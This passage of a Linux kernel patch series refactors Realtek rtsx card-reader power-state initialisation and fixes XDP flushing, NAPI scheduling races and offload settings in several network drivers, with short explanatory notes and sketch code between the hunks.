+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+ 	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_2_EN);
++		rtsx_pci_enable_oobs_polling(pcr);
+ 
+ 	rtsx_pci_write_register(pcr, ASPM_FORCE_CTL, 0xFF, 0);
+-	if (option->ltr_en) {
+-		u16 val;
+ 
+-		pcie_capability_read_word(pcr->pci, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++	if (option->ltr_en) {
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+ }
+ 
+ static int rts5228_extra_init_hw(struct rtsx_pcr *pcr)
+ {
++	struct rtsx_cr_option *option = &pcr->option;
+ 
+ 	rtsx_pci_write_register(pcr, RTS5228_AUTOLOAD_CFG1,
+ 			CD_RESUME_EN_MASK, CD_RESUME_EN_MASK);
+@@ -469,6 +435,17 @@ static int rts5228_extra_init_hw(struct rtsx_pcr *pcr)
+ 	else
+ 		rtsx_pci_write_register(pcr, PETXCFG, 0x30, 0x00);
+ 
++	/*
++	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
++	 * to drive low, and we forcibly request clock.
++	 */
++	if (option->force_clkreq_0)
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
++	else
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
++
+ 	rtsx_pci_write_register(pcr, PWD_SUSPEND_EN, 0xFF, 0xFB);
+ 
+ 	if (pcr->rtd3_en) {
+diff --git a/drivers/misc/cardreader/rts5249.c b/drivers/misc/cardreader/rts5249.c
+index 47ab72a43256b..6c81040e18bef 100644
+--- a/drivers/misc/cardreader/rts5249.c
++++ b/drivers/misc/cardreader/rts5249.c
+@@ -86,64 +86,22 @@ static void rtsx_base_fetch_vendor_settings(struct rtsx_pcr *pcr)
+ 
+ static void rts5249_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+ 	struct rtsx_cr_option *option = &(pcr->option);
+-	u32 lval;
+-
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+ 
+ 	if (CHK_PCI_PID(pcr, PID_524A) || CHK_PCI_PID(pcr, PID_525A)) {
+-		if (0 == (lval & 0x0F))
+-			rtsx_pci_enable_oobs_polling(pcr);
+-		else
++		if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
++				| PM_L1_1_EN | PM_L1_2_EN))
+ 			rtsx_pci_disable_oobs_polling(pcr);
++		else
++			rtsx_pci_enable_oobs_polling(pcr);
+ 	}
+ 
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+-
+ 	if (option->ltr_en) {
+-		u16 val;
+-
+-		pcie_capability_read_word(pdev, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+ }
+ 
+-static int rts5249_init_from_hw(struct rtsx_pcr *pcr)
+-{
+-	struct rtsx_cr_option *option = &(pcr->option);
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+-
+-	return 0;
+-}
+-
+ static void rts52xa_force_power_down(struct rtsx_pcr *pcr, u8 pm_state, bool runtime)
+ {
+ 	/* Set relink_time to 0 */
+@@ -276,7 +234,6 @@ static int rts5249_extra_init_hw(struct rtsx_pcr *pcr)
+ 	struct rtsx_cr_option *option = &(pcr->option);
+ 
+ 	rts5249_init_from_cfg(pcr);
+-	rts5249_init_from_hw(pcr);
+ 
+ 	rtsx_pci_init_cmd(pcr);
+ 
+@@ -327,11 +284,12 @@ static int rts5249_extra_init_hw(struct rtsx_pcr *pcr)
+ 		}
+ 	}
+ 
++
+ 	/*
+ 	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+ 	 * to drive low, and we forcibly request clock.
+ 	 */
+-	if (option->force_clkreq_0 && pcr->aspm_mode == ASPM_MODE_CFG)
++	if (option->force_clkreq_0)
+ 		rtsx_pci_write_register(pcr, PETXCFG,
+ 			FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+ 	else
+diff --git a/drivers/misc/cardreader/rts5260.c b/drivers/misc/cardreader/rts5260.c
+index 79b18f6f73a8a..d2d3a6ccb8f7d 100644
+--- a/drivers/misc/cardreader/rts5260.c
++++ b/drivers/misc/cardreader/rts5260.c
+@@ -480,47 +480,19 @@ static void rts5260_pwr_saving_setting(struct rtsx_pcr *pcr)
+ 
+ static void rts5260_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+ 	struct rtsx_cr_option *option = &pcr->option;
+-	u32 lval;
+-
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+ 
+ 	rts5260_pwr_saving_setting(pcr);
+ 
+ 	if (option->ltr_en) {
+-		u16 val;
+-
+-		pcie_capability_read_word(pdev, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+ }
+ 
+ static int rts5260_extra_init_hw(struct rtsx_pcr *pcr)
+ {
++	struct rtsx_cr_option *option = &pcr->option;
+ 
+ 	/* Set mcu_cnt to 7 to ensure data can be sampled properly */
+ 	rtsx_pci_write_register(pcr, 0xFC03, 0x7F, 0x07);
+@@ -539,6 +511,17 @@ static int rts5260_extra_init_hw(struct rtsx_pcr *pcr)
+ 
+ 	rts5260_init_hw(pcr);
+ 
++	/*
++	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
++	 * to drive low, and we forcibly request clock.
++	 */
++	if (option->force_clkreq_0)
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
++	else
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
++
+ 	rtsx_pci_write_register(pcr, pcr->reg_pm_ctrl3, 0x10, 0x00);
+ 
+ 	return 0;
+diff --git a/drivers/misc/cardreader/rts5261.c b/drivers/misc/cardreader/rts5261.c
+index 94af6bf8a25a6..67252512a1329 100644
+--- a/drivers/misc/cardreader/rts5261.c
++++ b/drivers/misc/cardreader/rts5261.c
+@@ -454,54 +454,17 @@ static void rts5261_init_from_hw(struct rtsx_pcr *pcr)
+ 
+ static void rts5261_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+-	u32 lval;
+ 	struct rtsx_cr_option *option = &pcr->option;
+ 
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_2_EN);
+-
+-	rtsx_pci_write_register(pcr, ASPM_FORCE_CTL, 0xFF, 0);
+ 	if (option->ltr_en) {
+-		u16 val;
+-
+-		pcie_capability_read_word(pdev, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+ }
+ 
+ static int rts5261_extra_init_hw(struct rtsx_pcr *pcr)
+ {
++	struct rtsx_cr_option *option = &pcr->option;
+ 	u32 val;
+ 
+ 	rtsx_pci_write_register(pcr, RTS5261_AUTOLOAD_CFG1,
+@@ -547,6 +510,17 @@ static int rts5261_extra_init_hw(struct rtsx_pcr *pcr)
+ 	else
+ 		rtsx_pci_write_register(pcr, PETXCFG, 0x30, 0x00);
+ 
++	/*
++	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
++	 * to drive low, and we forcibly request clock.
++	 */
++	if (option->force_clkreq_0)
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
++	else
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
++
+ 	rtsx_pci_write_register(pcr, PWD_SUSPEND_EN, 0xFF, 0xFB);
+ 
+ 	if (pcr->rtd3_en) {
+diff --git a/drivers/misc/cardreader/rtsx_pcr.c b/drivers/misc/cardreader/rtsx_pcr.c
+index a3f4b52bb159f..a30751ad37330 100644
+--- a/drivers/misc/cardreader/rtsx_pcr.c
++++ b/drivers/misc/cardreader/rtsx_pcr.c
+@@ -1326,11 +1326,8 @@ static int rtsx_pci_init_hw(struct rtsx_pcr *pcr)
+ 			return err;
+ 	}
+ 
+-	if (pcr->aspm_mode == ASPM_MODE_REG) {
++	if (pcr->aspm_mode == ASPM_MODE_REG)
+ 		rtsx_pci_write_register(pcr, ASPM_FORCE_CTL, 0x30, 0x30);
+-		rtsx_pci_write_register(pcr, PETXCFG,
+-				FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
+-	}
+ 
+ 	/* No CD interrupt if probing driver with card inserted.
+ 	 * So we need to initialize pcr->card_exist here.
+@@ -1345,7 +1342,9 @@ static int rtsx_pci_init_hw(struct rtsx_pcr *pcr)
+ 
+ static int rtsx_pci_init_chip(struct rtsx_pcr *pcr)
+ {
+-	int err;
++	struct rtsx_cr_option *option = &(pcr->option);
++	int err, l1ss;
++	u32 lval;
+ 	u16 cfg_val;
+ 	u8 val;
+ 
+@@ -1430,6 +1429,48 @@ static int rtsx_pci_init_chip(struct rtsx_pcr *pcr)
+ 			pcr->aspm_enabled = true;
+ 	}
+ 
++	l1ss = pci_find_ext_capability(pcr->pci, PCI_EXT_CAP_ID_L1SS);
++	if (l1ss) {
++		pci_read_config_dword(pcr->pci, l1ss + PCI_L1SS_CTL1, &lval);
++
++		if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
++			rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
++		else
++			rtsx_clear_dev_flag(pcr, ASPM_L1_1_EN);
++
++		if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
++			rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
++		else
++			rtsx_clear_dev_flag(pcr, ASPM_L1_2_EN);
++
++		if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
++			rtsx_set_dev_flag(pcr, PM_L1_1_EN);
++		else
++			rtsx_clear_dev_flag(pcr, PM_L1_1_EN);
++
++		if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
++			rtsx_set_dev_flag(pcr, PM_L1_2_EN);
++		else
++			rtsx_clear_dev_flag(pcr, PM_L1_2_EN);
++
++		pcie_capability_read_word(pcr->pci, PCI_EXP_DEVCTL2, &cfg_val);
++		if (cfg_val & PCI_EXP_DEVCTL2_LTR_EN) {
++			option->ltr_enabled = true;
++			option->ltr_active = true;
++		} else {
++			option->ltr_enabled = false;
++		}
++
++		if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
++				| PM_L1_1_EN | PM_L1_2_EN))
++			option->force_clkreq_0 = false;
++		else
++			option->force_clkreq_0 = true;
++	} else {
++		option->ltr_enabled = false;
++		option->force_clkreq_0 = true;
++	}
++
+ 	if (pcr->ops->fetch_vendor_settings)
+ 		pcr->ops->fetch_vendor_settings(pcr);
+ 
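
The rtsx hunks above hoist the duplicated L1SS parsing out of the per-chip init_from_cfg() callbacks into rtsx_pci_init_chip(), where one read of PCI_L1SS_CTL1 sets all four substate flags and decides force_clkreq_0. A runnable model of the bit parsing (register bit values as in include/uapi/linux/pci_regs.h):

#include <stdint.h>
#include <stdio.h>

#define PCI_L1SS_CTL1_PCIPM_L1_2	0x00000001
#define PCI_L1SS_CTL1_PCIPM_L1_1	0x00000002
#define PCI_L1SS_CTL1_ASPM_L1_2		0x00000004
#define PCI_L1SS_CTL1_ASPM_L1_1		0x00000008

int main(void)
{
	/* pretend pci_read_config_dword() returned this */
	uint32_t lval = PCI_L1SS_CTL1_ASPM_L1_1 | PCI_L1SS_CTL1_PCIPM_L1_2;

	int aspm_l1_1 = !!(lval & PCI_L1SS_CTL1_ASPM_L1_1);
	int force_clkreq_0 = !(lval & 0x0f);	/* only if no substate enabled */

	printf("ASPM L1.1 %sabled, force_clkreq_0=%d\n",
	       aspm_l1_1 ? "en" : "dis", force_clkreq_0);
	return 0;
}
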
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 5ce01ac72637e..42a66b74c1e5b 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -1778,6 +1778,9 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 	return work_done;
+ 
+ error:
++	if (xdp_flags & ENA_XDP_REDIRECT)
++		xdp_do_flush();
++
+ 	adapter = netdev_priv(rx_ring->netdev);
+ 
+ 	if (rc == -ENOSPC) {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 969db3c45d176..e81cb825dff4c 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -2654,6 +2654,7 @@ static int bnxt_poll_nitroa0(struct napi_struct *napi, int budget)
+ 	struct rx_cmp_ext *rxcmp1;
+ 	u32 cp_cons, tmp_raw_cons;
+ 	u32 raw_cons = cpr->cp_raw_cons;
++	bool flush_xdp = false;
+ 	u32 rx_pkts = 0;
+ 	u8 event = 0;
+ 
+@@ -2688,6 +2689,8 @@ static int bnxt_poll_nitroa0(struct napi_struct *napi, int budget)
+ 				rx_pkts++;
+ 			else if (rc == -EBUSY)	/* partial completion */
+ 				break;
++			if (event & BNXT_REDIRECT_EVENT)
++				flush_xdp = true;
+ 		} else if (unlikely(TX_CMP_TYPE(txcmp) ==
+ 				    CMPL_BASE_TYPE_HWRM_DONE)) {
+ 			bnxt_hwrm_handler(bp, txcmp);
+@@ -2707,6 +2710,8 @@ static int bnxt_poll_nitroa0(struct napi_struct *napi, int budget)
+ 
+ 	if (event & BNXT_AGG_EVENT)
+ 		bnxt_db_write(bp, &rxr->rx_agg_db, rxr->rx_agg_prod);
++	if (flush_xdp)
++		xdp_do_flush();
+ 
+ 	if (!bnxt_has_work(bp, cpr) && rx_pkts < budget) {
+ 		napi_complete_done(napi, rx_pkts);
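
The ena and bnxt hunks above make sure xdp_do_flush() also runs on early-exit paths: any completion that redirected a frame sets a flag, and the flush happens once when the poll loop ends, however it ends. A runnable model of the pattern (xdp_do_flush_model() stands in for the real flush):

#include <stdbool.h>
#include <stdio.h>

static void xdp_do_flush_model(void) { puts("flush XDP redirect queues"); }

static int poll_model(int budget)
{
	bool flush_xdp = false;
	int pkts = 0;

	while (pkts < budget) {
		flush_xdp = true;	/* this packet was XDP_REDIRECTed */
		pkts++;
		if (pkts == 2)		/* simulate the early error exit */
			goto out;
	}
out:
	if (flush_xdp)			/* runs on success and error paths alike */
		xdp_do_flush_model();
	return pkts;
}

int main(void)
{
	poll_model(8);
	return 0;
}
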
+diff --git a/drivers/net/ethernet/engleder/tsnep_main.c b/drivers/net/ethernet/engleder/tsnep_main.c
+index 6bf3cc11d2121..2be518db04270 100644
+--- a/drivers/net/ethernet/engleder/tsnep_main.c
++++ b/drivers/net/ethernet/engleder/tsnep_main.c
+@@ -65,8 +65,11 @@ static irqreturn_t tsnep_irq(int irq, void *arg)
+ 
+ 	/* handle TX/RX queue 0 interrupt */
+ 	if ((active & adapter->queue[0].irq_mask) != 0) {
+-		tsnep_disable_irq(adapter, adapter->queue[0].irq_mask);
+-		napi_schedule(&adapter->queue[0].napi);
++		if (napi_schedule_prep(&adapter->queue[0].napi)) {
++			tsnep_disable_irq(adapter, adapter->queue[0].irq_mask);
++			/* schedule after masking to avoid races */
++			__napi_schedule(&adapter->queue[0].napi);
++		}
+ 	}
+ 
+ 	return IRQ_HANDLED;
+@@ -77,8 +80,11 @@ static irqreturn_t tsnep_irq_txrx(int irq, void *arg)
+ 	struct tsnep_queue *queue = arg;
+ 
+ 	/* handle TX/RX queue interrupt */
+-	tsnep_disable_irq(queue->adapter, queue->irq_mask);
+-	napi_schedule(&queue->napi);
++	if (napi_schedule_prep(&queue->napi)) {
++		tsnep_disable_irq(queue->adapter, queue->irq_mask);
++		/* schedule after masking to avoid races */
++		__napi_schedule(&queue->napi);
++	}
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -924,6 +930,10 @@ static int tsnep_poll(struct napi_struct *napi, int budget)
+ 	if (queue->tx)
+ 		complete = tsnep_tx_poll(queue->tx, budget);
+ 
++	/* handle case where we are called by netpoll with a budget of 0 */
++	if (unlikely(budget <= 0))
++		return budget;
++
+ 	if (queue->rx) {
+ 		done = tsnep_rx_poll(queue->rx, napi, budget);
+ 		if (done >= budget)
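
The tsnep changes combine two stock NAPI idioms: claim the NAPI instance with
napi_schedule_prep() before masking the device interrupt, so the mask/schedule
pair cannot race with a concurrent poller, and bail out of the poll function
when netpoll invokes it with a budget of 0, where only TX completion work is
permitted. A condensed sketch, with the device-specific calls as stand-ins
(all my_* names are illustrative):

#include <linux/interrupt.h>
#include <linux/netdevice.h>

struct my_queue {				/* stand-in queue type */
	struct napi_struct napi;
};

void my_mask_irq(struct my_queue *q);		/* stand-in helpers */
void my_unmask_irq(struct my_queue *q);
void my_tx_clean(struct my_queue *q);
int my_rx_clean(struct my_queue *q, int budget);

static irqreturn_t my_irq(int irq, void *arg)
{
	struct my_queue *q = arg;

	if (napi_schedule_prep(&q->napi)) {
		my_mask_irq(q);			/* mask only once we own NAPI */
		__napi_schedule(&q->napi);	/* schedule after masking */
	}
	return IRQ_HANDLED;
}

static int my_poll(struct napi_struct *napi, int budget)
{
	struct my_queue *q = container_of(napi, struct my_queue, napi);
	int done;

	my_tx_clean(q);			/* TX completion is always allowed */

	if (unlikely(budget <= 0))	/* netpoll: no RX work permitted */
		return budget;

	done = my_rx_clean(q, budget);
	if (done < budget && napi_complete_done(napi, done))
		my_unmask_irq(q);
	return done;
}
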
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 8aae179554a81..04c9baca1b0f8 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -3352,6 +3352,15 @@ static void hns3_set_default_feature(struct net_device *netdev)
+ 		  NETIF_F_HW_TC);
+ 
+ 	netdev->hw_enc_features |= netdev->vlan_features | NETIF_F_TSO_MANGLEID;
++
++	/* The device_version V3 hardware can't offload the checksum for IP
++	 * in GRE packets, but can do it for NvGRE, so disable the checksum
++	 * and GSO offload for GRE by default.
++	 */
++	if (ae_dev->dev_version > HNAE3_DEVICE_VERSION_V2) {
++		netdev->features &= ~NETIF_F_GSO_GRE;
++		netdev->features &= ~NETIF_F_GSO_GRE_CSUM;
++	}
+ }
+ 
+ static int hns3_alloc_buffer(struct hns3_enet_ring *ring,
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 884e45fb6b72e..3e1d202d60ce1 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -3662,9 +3662,14 @@ static u32 hclge_check_event_cause(struct hclge_dev *hdev, u32 *clearval)
+ static void hclge_clear_event_cause(struct hclge_dev *hdev, u32 event_type,
+ 				    u32 regclr)
+ {
++#define HCLGE_IMP_RESET_DELAY		5
++
+ 	switch (event_type) {
+ 	case HCLGE_VECTOR0_EVENT_PTP:
+ 	case HCLGE_VECTOR0_EVENT_RST:
++		if (regclr == BIT(HCLGE_VECTOR0_IMPRESET_INT_B))
++			mdelay(HCLGE_IMP_RESET_DELAY);
++
+ 		hclge_write_dev(&hdev->hw, HCLGE_MISC_RESET_STS_REG, regclr);
+ 		break;
+ 	case HCLGE_VECTOR0_EVENT_MBX:
+@@ -7454,6 +7459,12 @@ static int hclge_del_cls_flower(struct hnae3_handle *handle,
+ 	ret = hclge_fd_tcam_config(hdev, HCLGE_FD_STAGE_1, true, rule->location,
+ 				   NULL, false);
+ 	if (ret) {
++		/* If the tcam config fails, set the rule state to TO_DEL
++		 * so the rule will be deleted when the periodic task
++		 * is scheduled.
++		 */
++		hclge_update_fd_list(hdev, HCLGE_FD_TO_DEL, rule->location, NULL);
++		set_bit(HCLGE_STATE_FD_TBL_CHANGED, &hdev->state);
+ 		spin_unlock_bh(&hdev->fd_rule_lock);
+ 		return ret;
+ 	}
+@@ -8930,7 +8941,7 @@ static void hclge_update_overflow_flags(struct hclge_vport *vport,
+ 	if (mac_type == HCLGE_MAC_ADDR_UC) {
+ 		if (is_all_added)
+ 			vport->overflow_promisc_flags &= ~HNAE3_OVERFLOW_UPE;
+-		else
++		else if (hclge_is_umv_space_full(vport, true))
+ 			vport->overflow_promisc_flags |= HNAE3_OVERFLOW_UPE;
+ 	} else {
+ 		if (is_all_added)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index b1b14850e958f..72cf5145e15a2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -1909,7 +1909,8 @@ static void hclgevf_periodic_service_task(struct hclgevf_dev *hdev)
+ 	unsigned long delta = round_jiffies_relative(HZ);
+ 	struct hnae3_handle *handle = &hdev->nic;
+ 
+-	if (test_bit(HCLGEVF_STATE_RST_FAIL, &hdev->state))
++	if (test_bit(HCLGEVF_STATE_RST_FAIL, &hdev->state) ||
++	    test_bit(HCLGE_COMM_STATE_CMD_DISABLE, &hdev->hw.hw.comm_state))
+ 		return;
+ 
+ 	if (time_is_after_jiffies(hdev->last_serv_processed + HZ)) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index cb7cf672f6971..547e67d9470b7 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -4397,9 +4397,7 @@ int i40e_ndo_set_vf_port_vlan(struct net_device *netdev, int vf_id,
+ 		goto error_pvid;
+ 
+ 	i40e_vlan_stripping_enable(vsi);
+-	i40e_vc_reset_vf(vf, true);
+-	/* During reset the VF got a new VSI, so refresh a pointer. */
+-	vsi = pf->vsi[vf->lan_vsi_idx];
++
+ 	/* Locked once because multiple functions below iterate list */
+ 	spin_lock_bh(&vsi->mac_filter_hash_lock);
+ 
+@@ -4485,6 +4483,10 @@ int i40e_ndo_set_vf_port_vlan(struct net_device *netdev, int vf_id,
+ 	 */
+ 	vf->port_vlan_id = le16_to_cpu(vsi->info.pvid);
+ 
++	i40e_vc_reset_vf(vf, true);
++	/* During reset the VF got a new VSI, so refresh a pointer. */
++	vsi = pf->vsi[vf->lan_vsi_idx];
++
+ 	ret = i40e_config_vf_promiscuous_mode(vf, vsi->id, allmulti, alluni);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev, "Unable to config vf promiscuous mode\n");
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 543931c06bb17..06cfd567866c2 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -521,7 +521,7 @@ void iavf_down(struct iavf_adapter *adapter);
+ int iavf_process_config(struct iavf_adapter *adapter);
+ int iavf_parse_vf_resource_msg(struct iavf_adapter *adapter);
+ void iavf_schedule_reset(struct iavf_adapter *adapter, u64 flags);
+-void iavf_schedule_request_stats(struct iavf_adapter *adapter);
++void iavf_schedule_aq_request(struct iavf_adapter *adapter, u64 flags);
+ void iavf_schedule_finish_config(struct iavf_adapter *adapter);
+ void iavf_reset(struct iavf_adapter *adapter);
+ void iavf_set_ethtool_ops(struct net_device *netdev);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index fe912b1c468ef..c13b4fa659ee9 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -362,7 +362,7 @@ static void iavf_get_ethtool_stats(struct net_device *netdev,
+ 	unsigned int i;
+ 
+ 	/* Explicitly request stats refresh */
+-	iavf_schedule_request_stats(adapter);
++	iavf_schedule_aq_request(adapter, IAVF_FLAG_AQ_REQUEST_STATS);
+ 
+ 	iavf_add_ethtool_stats(&data, adapter, iavf_gstrings_stats);
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 22bc57ee24228..a39f7f0d6ab0b 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -322,15 +322,13 @@ void iavf_schedule_reset(struct iavf_adapter *adapter, u64 flags)
+ }
+ 
+ /**
+- * iavf_schedule_request_stats - Set the flags and schedule statistics request
++ * iavf_schedule_aq_request - Set the flags and schedule aq request
+  * @adapter: board private structure
+- *
+- * Sets IAVF_FLAG_AQ_REQUEST_STATS flag so iavf_watchdog_task() will explicitly
+- * request and refresh ethtool stats
++ * @flags: requested aq flags
+  **/
+-void iavf_schedule_request_stats(struct iavf_adapter *adapter)
++void iavf_schedule_aq_request(struct iavf_adapter *adapter, u64 flags)
+ {
+-	adapter->aq_required |= IAVF_FLAG_AQ_REQUEST_STATS;
++	adapter->aq_required |= flags;
+ 	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
+ }
+ 
+@@ -831,7 +829,7 @@ iavf_vlan_filter *iavf_add_vlan(struct iavf_adapter *adapter,
+ 		list_add_tail(&f->list, &adapter->vlan_filter_list);
+ 		f->state = IAVF_VLAN_ADD;
